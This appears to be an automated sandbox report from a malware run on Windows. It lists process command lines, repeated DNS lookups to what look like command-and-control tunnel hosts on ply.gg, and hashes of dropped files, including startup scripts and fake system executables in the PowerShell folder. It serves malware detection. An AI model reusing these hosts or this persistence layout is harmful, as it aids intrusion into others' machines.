"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fffec2046f8,0x7fffec204708,0x7fffec204718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,1430714184297952503,12384781248704128857,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,1430714184297952503,12384781248704128857,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Network

Country Destination Domain Proto
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 ip-api.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.4.4:53 google.com udp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 193.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 best-bird.gl.at.ply.gg udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp
US 8.8.8.8:53 finally-grande.gl.at.ply.gg udp
US 8.8.8.8:53 i.ibb.co udp

Files

memory/2652-0-0x00007FFFEFE53000-0x00007FFFEFE55000-memory.dmp

memory/2652-6-0x000001A8E25B0000-0x000001A8E25D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5tgvqcjs.ab4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2652-11-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp

memory/2652-12-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp

memory/2652-13-0x000001A8E27C0000-0x000001A8E2804000-memory.dmp

memory/2652-14-0x000001A8E2A30000-0x000001A8E2AA6000-memory.dmp

memory/2652-15-0x000001A8E2600000-0x000001A8E2608000-memory.dmp

memory/2652-16-0x000001A8E2AB0000-0x000001A8E2B8C000-memory.dmp

memory/2736-27-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp

memory/2736-28-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp

memory/2736-29-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp

memory/2736-32-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 661739d384d9dfd807a089721202900b
SHA1 5b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA256 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA512 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.vbs

MD5 ea54fc2cffa9e8e97b71383f1b5352fa
SHA1 cd694823076fed240ae0377fa748ccc1f537fae9
SHA256 f73070cc5832787d34a3f77f719bcb59370b7f18f25358fcc39fd64cb96c7f95
SHA512 095b4c02ba8a0118e7524a96409f11bf7706d8bba52a6ff688ee0110351d34e737e720f5aa6d36cff8982fc0634175de7beeece43db9457858010a48d094c251

C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.bat

MD5 1897b3980473ad054ab05b0f2ced4de7
SHA1 a694b444dc8dd30e07f69671c3905ffb6fe13532
SHA256 3d25b09ab5a16a6b49a7394175b3bce37ba2ae9ce8771408b05280b1bd14b036
SHA512 6f67fe1aca76aa0ff33ebf7f1edc4bae6b25c34c543ffa8f59220e520dea91fe92bd50681a5d3086353ef245bd28887bca93efa276ad2544dfbdbdd188ba5ee1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 005bc2ef5a9d890fb2297be6a36f01c2
SHA1 0c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256 342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512 f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

memory/2652-50-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp

memory/3488-51-0x0000000003270000-0x000000000329A000-memory.dmp

memory/3488-98-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp

memory/1372-100-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp

memory/1788-110-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp

memory/2056-114-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp

memory/2056-113-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp

memory/1788-109-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp

memory/1968-108-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp

memory/1968-107-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp

memory/1660-106-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp

memory/1660-105-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp

memory/2560-104-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp

memory/2560-103-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp

memory/896-102-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp

memory/896-101-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp

memory/1736-112-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp

memory/1736-111-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp

memory/1372-99-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp

memory/3488-97-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp

memory/620-189-0x0000019827810000-0x00000198278B4000-memory.dmp

C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe

MD5 e10c7425705b2bd3214fa96247ee21c4
SHA1 7603536b97ab6337fa023bafcf80579c2b4059e6
SHA256 021068ac225e479b124c33d9e7582c17fdea6e625b165b79e2c818479d8094e4
SHA512 47e031992d637fef2a67e4fb08d2d82eaba03eba6b80f3e0e0997153acf0d979d0294276c4a10a97daa50130540230865c56191e6fe8df07dbea11c50fa48a2d

C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe

MD5 092a0c6fe885844fd74947e64e7fc11e
SHA1 bfe46f64f36f2e927d862a1a787f146ed2c01219
SHA256 91431cb73305e0f1fdc698907301b6d312a350f667c50765615672e7f10a68f2
SHA512 022589bd17b46e5486971a59b2517956bb15815266e48dc73a7ae9ac9efd42a348af09df471562eb71ffc94ce1e1845d54ca2994663d1496a385bce50ae595f0

C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exe

MD5 27fe9341167a34f606b800303ac54b1f
SHA1 86373d218b48361bff1c23ddd08b6ab1803a51d0
SHA256 29e13a91af9b0ac77e9b7f8b0c26e5702f46bd8aea0333ca2d191d1d09c70c5d
SHA512 05b83ad544862d9c0cfc2651b2842624cff59fc4f454e0b1a2b36a705b558fad5a834f9f1af9f2626c57f1e3cd9aa400e290eaafb6efeb680422992bcbbde5b0

memory/4996-219-0x0000000000DE0000-0x0000000000DF8000-memory.dmp

memory/4332-225-0x0000000000800000-0x0000000000816000-memory.dmp

C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe

MD5 1f1b23752df3d29e7604ba52aea85862
SHA1 bb582c6cf022098b171c4c9c7318a51de29ebcf4
SHA256 4834d31394f19d42e8d2a035b4c3c9c36441340ea19fe766396848ecfb608960
SHA512 d52722ab73bb15d4a5b0033351f98f168192f382677e6d474f6cf506cf8dc2f5e421e45279b6cac0f074857f41a865d87b5d989450bfcb8eba925b7baa12fbde

memory/2360-237-0x00000000007A0000-0x00000000007BA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 4158365912175436289496136e7912c2
SHA1 813d11f772b1cfe9ceac2bf37f4f741e5e8fbe59
SHA256 354de4b033ba6e4d85f94d91230cb8501f62e0a4e302cd4076c7e0ad73bedbd1
SHA512 74b4f7b24ad4ea395f3a4cd8dbfae54f112a7c87bce3d286ee5161f6b63d62dfa19bb0d96bb7ed1c6d925f5697a2580c25023d5052c6a09992e6fd9dd49ea82b

\??\pipe\LOCAL\crashpad_2340_PULPCHEOHDMFVBUS

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ce4c898f8fc7601e2fbc252fdadb5115
SHA1 01bf06badc5da353e539c7c07527d30dccc55a91
SHA256 bce2dfaa91f0d44e977e0f79c60e64954a7b9dc828b0e30fbaa67dbe82f750aa
SHA512 80fff4c722c8d3e69ec4f09510779b7e3518ae60725d2d36903e606a27ec1eaedbdbfac5b662bf2c19194c572ccf0125445f22a907b329ad256e6c00b9cf032c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 24a1b8cbcd8c68c91c2cdedec7989966
SHA1 2d65b0266699c1ba4f0cc0cb2b3a71c1031b9de0
SHA256 5cafbd0285d32183dc26dd3c6b2cd1abecb2394aeed9343622cabefe8ebdb79c
SHA512 b489719003c6d2956dc4ef7a8355747abbb05900d8e903f5e4c76f98acdf38f3421bc10fe96e2a684830c74d8958004245e2dc61a5a3631786ce4fafc4a202f5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 71c4b1323b5c2b0b3dce79a418170c57
SHA1 f2484755165cc812bd2017c3ff93d7aef8e9f642
SHA256 b7151a59702581451ad3accb25d5aa7889a4d385142568331f42b0fcc2019872
SHA512 9048311d8ca08c33c090038fce1b5f28d22e1b9b0c1a6bb27f97619c778e2d474a3f10ab92c76bd487b94e059b5d066d1d960eec15b6a3a74355099494172e51

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a2a3e713b8102a049e33bcd4fee0e4d6
SHA1 744cd284be9388f9520a3f4701d23bc9ddcb0146
SHA256 195332abc0ac61ad5a80f4afad532924270e08ecff0b889c39b8d1c87475ac90
SHA512 41d911e6a4010f34927971f61c4ced3c91388408867367ce35d2e2cf687592f68909704d5ad07c73c95fcfb8cfc5eab0e84e8b3033fc2b1411b2cb6b17ab5c9e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d84f682c536219c60b20ca215d3e8495
SHA1 fa7626f812b4f5998713ba2aa4aba0b748493818
SHA256 750b2c6291f33326f332f876eadf9ae400a51a0445d294896781391328d6b9fa
SHA512 76d3e0e886a2afd0d634f66130020dd4cf16ddd8becac2807e37e1b6882c72173d31ef215cd5d5256933ed585cfa20e5178c78f50437b2cee3809904b7b71cba

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0b9413c83e56e3c23e204843dce03482
SHA1 56b4bb587536ec43ccf5d1a1dc549a1008890a0c
SHA256 78d3158c6a79639b012ef7851b46489a4c020e971482a7be198ec74e63a9a281
SHA512 350a951d8413d0d654240a85b561087b10c5aa47c8a2351c8dba3ddb9e9ec3b33a1aace1386983fc0f6730a78028ac2482de1c56fd1c5f4bdfc6bf1d7d08df92

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 1e8e2076314d54dd72e7ee09ff8a52ab
SHA1 5fd0a67671430f66237f483eef39ff599b892272
SHA256 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA512 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 0b990e24f1e839462c0ac35fef1d119e
SHA1 9e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256 a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512 c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1 a3879621f9493414d497ea6d70fbf17e283d5c08
SHA256 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA512 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 7d612892b20e70250dbd00d0cdd4f09b
SHA1 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512 f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 8abf2d6067c6f3191a015f84aa9b6efe
SHA1 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256 ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512 c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 f313c5b4f95605026428425586317353
SHA1 06be66fa06e1cffc54459c38d3d258f46669d01a
SHA256 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512 b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 59c7f92111cb0ed9f61807ad8fb69201
SHA1 012a06dd89a0098cb073339865a31f378d1758b8
SHA256 d5bc36c8062e07c33224b0d332303c430edce4efff9423278766fe68a45003bd
SHA512 cce71225de2f41fb2202449898e3a61d29ba674603813b5aef09c8bb9f904efa1434bcd9965078448b78e94acf7735bae0f345c5dfacff6f27257d60c34c64c7

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 9042b277c61a53ff2a33a1c912284a6a
SHA1 0212cd7f802081b79ffda2150c074da22f17471f
SHA256 1e0431d52511ec083b0e21858f989d8622bd324321cc14c97152cc34731fb7c3
SHA512 7e3db95bb41e2240b73aacb18996e3ec654a7a5b3a8a1e866215652fdc229552b8c6493d65f77e0d48900d7c14c01bf1d2d55ad7662ef6d417b7d52fed4307b1

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 41f01682bc2908a8ce161b6246da5639
SHA1 9be8f8c21d2478e90115baaa692d6151dcc23718
SHA256 5e0f66d762201a494e811400801fe266186a27628f65f83e44c1bcbfdf34661c
SHA512 88ad5601291e4f917e7fec5f08218eaac9a53bb1aa9566a1b3a9aa01a714cc68b91d79ab01a07cd1a31b747390703211b29ff910e1b3a5f1094c1af0b3d35e13

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 58b5892e88a79021b5a3cb67628274a6
SHA1 24525deda7f2f67375e2398ff11600285dbcfbf6
SHA256 92c2d3506079a411774b46a3884b1701ee6eca86150df379fd24121095b3033d
SHA512 fc5be508111d35234e89f5204b386cb6ff0ceaaf1a275955a8a3ff9e1e77963875f247632a002d0ae8e71d899f01c074db4f308d71b77f396fd67b258e079741

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 fbf7ea4d37e806d4715d00f163a5f51c
SHA1 7f25bdfc8896bfbcd752264a03a67f3c5727f8bd
SHA256 e21c5fa361c5353b3e5f4e56b389a094bbd577bc3a3745e4a150d07f3efa2210
SHA512 4879988db14df5474b37f5f23b2c758e2c5a0cb6223a6951ccf8fb0d38fbd5e57c7982963e6f3979b46097dc9c5876f38cd2821f72060aeb94a8f53945212aef

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 7c868fd556f6cdfaf9ccee6bbe6a1c9e
SHA1 ac23dd52faea0d97c6ea727f8ca896f456722a39
SHA256 863017562cb081b8d1f69c05ded1df3b4c9d0e2c391a90162b730347b1124001
SHA512 10764f83320fbeeef5fe5e77355c4380dda86c5b102622b64d386fdd211c54b6043eda832496e577f832237b8defb0271da671207024889d49f71a40521776cd

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 7fcd8a23617cdee8cf4d1597f91e53b2
SHA1 eae7baeb0bd5dabbea13e2a9048dc56c9b8f11bd
SHA256 62fc3d66c994983cebd413784dcb859a79b89a66e67ea2260ea9afc2434f06df
SHA512 b03045688f41550fe6f802beb22d62f50641aa32276796f639e0a0876c5770034fe580a184961f624e30719f7b91f8c8a27279fb44cb3b914a12f43cc0d566cc

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 d6287061cc091a7f4906611a175eac9d
SHA1 3c23cf12f57aebce123d1b6cf89dea3fb3f74b21
SHA256 cecd1db0a4fd12e6da6776882860c254e8bddf3fc5fd802547ff99baac438fea
